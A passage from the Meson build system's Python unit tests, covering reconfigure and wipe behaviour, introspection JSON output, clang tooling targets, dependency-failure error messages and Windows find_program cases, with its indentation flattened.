with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = r'{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
# Set an older version to force a reconfigure from scratch
filename = os.path.join(self.privatedir, 'coredata.dat')
with open(filename, 'rb') as f:
obj = pickle.load(f)
if change_minor:
v = mesonbuild.coredata.version.split('.')
obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
else:
obj.version = '0.47.0'
with open(filename, 'wb') as f:
pickle.dump(obj, f)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure()
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
# Create a file in builddir and verify wipe command removes it
filename = os.path.join(self.builddir, 'something')
open(filename, 'w').close()
self.assertTrue(os.path.exists(filename))
out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
self.assertFalse(os.path.exists(filename))
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 val4')
self.build()
self.run_tests()
def test_wipe_from_builddir(self):
testdir = os.path.join(self.common_test_dir, '161 custom target subdir depend files')
self.init(testdir)
self.__reconfigure()
with Path(self.builddir):
self.init(testdir, extra_args=['--wipe'])
def test_minor_version_does_not_reconfigure_wipe(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure(change_minor=True)
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertNotRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
def test_target_construct_id_from_path(self):
# This id is stable but not guessable.
# The test is supposed to prevent unintentional
# changes of target ID generation.
target_id = Target.construct_id_from_path('some/obscure/subdir',
'target-id', '@suffix')
self.assertEqual('5e002d3@@target-id@suffix', target_id)
target_id = Target.construct_id_from_path('subproject/foo/subdir/bar',
'target2-id', '@other')
self.assertEqual('81d46d1@@target2-id@other', target_id)
def test_introspect_projectinfo_without_configured_build(self):
testfile = os.path.join(self.common_test_dir, '35 run program', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'run command')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '43 options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'options')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '46 subproject options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'suboptions')
self.assertEqual(len(res['subprojects']), 1)
subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build']))
self.assertEqual(res['subprojects'][0]['name'], 'subproject')
self.assertEqual(res['subprojects'][0]['version'], 'undefined')
self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
testdir = os.path.join(self.common_test_dir, '102 subproject subdir')
self.init(testdir)
res = self.introspect('--projectinfo')
expected = {
'descriptive_name': 'proj',
'version': 'undefined',
'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': 'undefined'
}
]
}
self.assertDictEqual(res, expected)
def test_introspection_target_subproject(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '78 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '78 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '71 cross')
# Do a build to generate a cross file where the host is this target
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_json_dump(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
def assertKeyTypes(key_type_list, obj):
for i in key_type_list:
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
('is_parallel', bool),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
]
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Check Tests and benchmarks
tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
'test1': ('executable', True, True, 'meson.build'),
'test2': ('executable', True, False, 'meson.build'),
'test3': ('executable', True, False, 'meson.build'),
}
for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
for idx, i in enumerate(res1):
if i['name'] == 'cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'buildtype':
res1[idx]['value'] = 'release'
if i['name'] == 'optimization':
res1[idx]['value'] = '3'
if i['name'] == 'debug':
res1[idx]['value'] = False
with open(introfile, 'r') as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_dependencies_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': False,
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '66 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
class FailureTests(BasePlatformTests):
'''
Tests that test failure conditions. Build files here should be dynamically
generated and static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
Assert that running meson configure on the specified @contents raises
a error message matching regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "[Vv]ersion.*string or list"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
"(requires a Objc compiler|{})".format(self.dnf),
langs = ['objc'])
def test_wx_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
"(required.*fail|{})".format(self.dnf))
def test_boost_notfound_dependency(self):
# Can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
"(fail.*not found|{})".format(self.dnf))
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost')",
"(BOOST_ROOT.*absolute|{})".format(self.dnf),
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
1. The correct message is outputted when a not-required dep is not
found and the fallback subproject is also not found.
2. A not-required fallback dependency is not found because the
subproject failed to parse.
3. A not-found not-required dep with a fallback subproject outputs the
correct message when the fallback subproject is found but the
variable inside it is not.
4. A fallback dependency is found from the subproject parsed in (3)
5. The correct message is outputted when the .wrap file is missing for
a sub-subproject.
'''
tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Subproject directory not found and .*nosubproj.wrap.* file not found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'WARNING:.* Dependency .*subsubproject.* not found but it is available in a sub-subproject.')
self.assertRegex(out, r'Subproject directory not found and .*subsubproject.wrap.* file not found')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targetting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targetting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targetting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# Finding a script in PATH w/o extension works and adds the interpreter
# (check only if `.PY` is in PATHEXT)
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
array of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
# To force people to update this test, and also test
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
